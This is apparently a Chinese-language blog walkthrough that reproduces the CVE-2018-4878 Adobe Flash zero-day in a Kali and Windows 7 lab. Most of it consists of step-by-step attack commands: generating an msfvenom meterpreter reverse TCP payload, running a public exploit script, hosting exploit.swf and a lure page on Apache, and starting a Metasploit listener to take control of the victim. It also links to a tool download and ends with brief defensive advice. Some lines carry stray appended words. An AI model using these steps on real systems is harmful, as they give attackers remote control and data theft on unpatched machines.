2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 28.0.0.137及其以前的版本,存在高危漏洞(CVE-2018-4878)。html
***者经过构造特殊的Flash连接,当用户用浏览器/邮件/Office访问此Flash连接时,会被“远程代码执行”,而且直接被getshell。python
直到2018年2月5号,Adboe才发布补丁来修复此0 day漏洞。
web
互联网上出现的基于此Flash 0day漏洞进行***的样本,其实在2017年末就已经由韩国计算机应急小组(KR-CERT)首次发现。shell
目前,全网已经有比较成熟的针对此Flash漏洞的利用代码,接下来,咱们为你们复现整个过程。apache
Kali Linux + Windows 7 sp1
***机:Kali Linux (ip:172.16.70.216)
靶机:Windows 7 sp1 (ip:172.16.70.199)
exp:cve-2018-4878.py
flash:flashplayer_activex_28.0.0.137.exewindows
注:此实验环境所用***机和靶机,跟以前文章所分享一致。为了节省你们实验时间,我将此实验涉及到的工具所有上传到网盘=>
连接:https://pan.baidu.com/s/1dotCoCx0AX8sgUaOqFT9vw 密码:0li0 浏览器
生成代码,其中lhost为kali的ip地址,lport为自定义的端口号 安全
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.70.216 lport=8888 -f python>shellcode.txt
tcp
查看代码文件 root@kali:~# cat shellcode.txt
ide
将上面msfvenom生成的代码覆盖掉原来的代码:
修改CVE-2018-4878.py下面的文件信息(后面会用到,以后保存修改退出):
④Kali Linux进入CVE-2018-4878-master路径,用Python执行CVE-2018-4878-master.py代码
root@kali:~/Desktop/CVE-2018-4878-master# python cve-2018-4878.py
root@kali:~/Desktop/CVE-2018-4878-master# ls -l
root@kali:~/Desktop/CVE-2018-4878-master# service apache2 start
root@kali:~/Desktop/CVE-2018-4878-master# cp index2.html /var/www/html/index2.html
root@kali:~/Desktop/CVE-2018-4878-master# cp exploit.swf /var/www/html/exploit.swf
此时,Kali Linux上Web服务启动,而且具有index2.html这个页面。只要靶机启用flash并访问了这个页面,则能够直接被控制。
使用handler监听模块 msf > use exploit/multi/handler
回弹一个tcp链接 msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
设置kali***机的ip地址 msf exploit(handler) > set lhost 172.16.70.216
设置监听端口,这个需跟上面msfvenom设置的端口一致 msf exploit(handler) > set lport 8888
开启监听,等待肉鸡上线 msf exploit(handler) > exploit
搜索flash最新的28版本
安装flash插件
使用Win7内置IE 8浏览器访问页面:http://172.16.70.216/index2.html
实验总结:
能够看到,最终因为Flash存在CVE-2018-4878这个高危漏洞,致使Windows靶机访问含flash的页面时,直接被Kali Linux控制。
真实环境下,不少***基于此Flash漏洞,结合社会工程学,例如将网页连接放置在诱导邮件中,欺骗大量用户点击,来达到最规模***效果。
在这里也呼吁你们:日常要很是当心陌生连接,相似这种“一点就中招”的高级******,确定还有不少没有浮出水面。像这个2017年其实已经出现的漏洞,早就有***已经在使用了,而中招者彻底不知情,整个***手法很是隐蔽。而2018年2月才有安全补丁,在这期间,有多少肉鸡被控制,这个不可思议。不少0day漏洞,***比大部分人都要提早知晓,在安全厂商没有出安全公告,或者没有打安全补丁的状况下,一个不当心,就会致使电脑被劫持,数据被窃取,形成极大的损失。
①直接到Adobe Flash官网,下载最新版本:https://get.adobe.com/cn/flashplayer/
②安装常见杀毒软件,开启实时防御和杀毒引擎实时升级。
相关推文:
[漏洞复现] MS17-010 基于"永恒之蓝"实现Windows Getshell